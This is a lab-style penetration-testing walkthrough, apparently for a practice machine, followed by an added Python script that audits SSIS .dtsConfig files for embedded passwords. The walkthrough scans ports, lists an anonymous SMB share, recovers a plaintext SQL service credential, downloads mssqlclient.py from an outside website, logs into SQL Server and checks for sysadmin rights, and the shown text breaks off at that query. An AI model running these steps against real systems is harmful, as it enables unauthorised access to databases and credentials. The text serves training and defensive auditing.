• Install Oracle VirtualBox 6.1.16
  • Install the Oracle VirtualBox Extension Pack
  • Download the Kali .ova virtual image 2020.3
  • Download the OpenVPN configuration file
  • Start the Kali machine and open a Terminal
  • Change the default password for user kali and for root
  • $ passwd kali | changes the default password for user kali
  • Switch user to root | $ sudo su | type the password for kali | $ passwd root
  • $ sudo openvpn eu.ovpn
  • The following commands will scan for open ports on a target IP
  • $ ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
  • $ nmap -sC -sV -p$ports 10.10.10.27
  • Ports 445 and 1433 are open, which are associated with file sharing (SMB) and SQL Server.
  • It is worth checking to see if anonymous access has been permitted, as file shares often store configuration files containing passwords or other sensitive information. We can use smbclient to list available shares.
  • $ smbclient -N -L \\\\10.10.10.27\\
  • It seems there is a share called backups. Let’s attempt to access it and see what’s inside.
  • $ smbclient -N \\\\10.10.10.27\\backups
  • smb: \> dir
  • There is a dtsConfig file, which is a config file used with SSIS.
  • We see that it contains a SQL connection string with credentials for the local Windows user ARCHETYPE\sql_svc.
  • Password=M3g4c0rp123
  • local Windows user ARCHETYPE\sql_svc
  • Show your current directory | $ pwd
  • Create a new directory called tools | $ mkdir tools
  • Change into the tools directory | $ cd tools
  • Download the tool called mssqlclient.py | $ wget http://ingrata.eu/wp-content/uploads/2020/10/mssqlclient.py_.zip
  • Extract the required tool | $ unzip mssqlclient.py_.zip
  • Delete the zip file | $ rm mssqlclient.py_.zip
  • Let’s try connecting to the SQL Server using Impacket’s mssqlclient.py.
  • $ python3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
  • Provide the password: M3g4c0rp123
  • We can use the IS_SRVROLEMEMBER function to reveal whether the current SQL user has sysadmin (highest level) privileges on the SQL Server. This is successful, and we do indeed have sysadmin privileges.
  • SQL> SELECT IS_SRVROLEMEMBER('sysadmin')
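
The dtsConfig finding above is the kind of thing a share audit should catch on the defending side. The following is an added example, not part of the original walkthrough: a Python check that parses an SSIS .dtsConfig file and reports connection strings with an embedded password, without echoing the secret. The sample XML is constructed (only the account name and password come from the page), and the function names are hypothetical.

```python
import xml.etree.ElementTree as ET

SECRET_KEYS = ("password", "pwd")   # connection-string keys that carry a secret
USER_KEYS = ("user id", "uid")

# Constructed sample in the SSIS .dtsConfig layout; only the Password and
# User ID values come from the walkthrough, everything else is made up.
SAMPLE = r"""<DTSConfiguration>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Persist Security Info=True;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Source].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Staging;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>"""


def parse_connection_string(value):
    """Split 'k=v;k=v' into a dict with lower-cased, stripped keys."""
    pairs = {}
    for part in value.split(";"):
        key, sep, val = part.partition("=")
        if sep:
            pairs[key.strip().lower()] = val.strip()
    return pairs


def audit_dtsconfig(xml_text):
    """Return one finding per <Configuration> whose value embeds a password."""
    findings = []
    # For untrusted files, consider defusedxml instead of the stdlib parser.
    for cfg in ET.fromstring(xml_text).iter("Configuration"):
        pairs = parse_connection_string(cfg.findtext("ConfiguredValue") or "")
        secret = next((k for k in SECRET_KEYS if pairs.get(k)), None)
        if secret is None:
            continue  # integrated auth or empty password: nothing stored
        user = next((pairs[k] for k in USER_KEYS if k in pairs), "<unknown>")
        findings.append({
            "path": cfg.get("Path"),
            "account": user,
            "secret_key": secret,
            "secret_length": len(pairs[secret]),  # never echo the secret itself
        })
    return findings


if __name__ == "__main__":
    for finding in audit_dtsconfig(SAMPLE):
        print(finding)
```

Only the first connection is reported; the second uses integrated authentication and stores no password, which is the configuration to move flagged entries toward.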
